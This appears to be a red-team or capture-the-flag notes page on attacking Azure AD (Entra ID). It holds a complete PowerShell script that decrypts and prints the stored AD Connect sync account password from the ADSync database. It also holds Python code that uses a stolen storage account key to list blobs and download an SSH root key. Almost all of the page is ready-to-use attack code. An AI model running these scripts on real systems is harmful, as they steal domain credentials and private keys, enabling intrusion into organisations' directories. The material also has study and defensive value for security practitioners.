Entra ID (Azure AD)
If you are on
Azure Admins
group?
## ------------------| Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/
## ------------------| Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
Azure Storage Development (Microsoft Azure Storage Explorer)
pip install azure.storage.blob
## Copy the key file /var/backups/key
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient
# Your connection string for the Azure Storage Emulator
connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;'
try:
# Create the BlobServiceClient object which will be used to create a container client
blob_service_client = BlobServiceClient.from_connection_string(connect_str, api_version='2020-06-12')
# Listing containers and files in them
for container in blob_service_client.list_containers():
print(container['name'])
container_client = blob_service_client.get_container_client(container['name'])
blob_list = container_client.list_blobs()
for blob in blob_list:
print("\t" + blob.name)
except Exception as ex:
print('Exception:')
print(ex)
from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, __version__
connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;'
try:
blob_service_client = BlobServiceClient.from_connection_string(connect_str, api_version='2020-06-12')
# Download the root key blob
blob_client = blob_service_client.get_blob_client(container='ssh-keys', blob='root.key')
with open('./root.key', "wb") as download_file:
download_file.write(blob_client.download_blob().readall())
except Exception as ex:
print('Exception:')
print(ex)
Last updated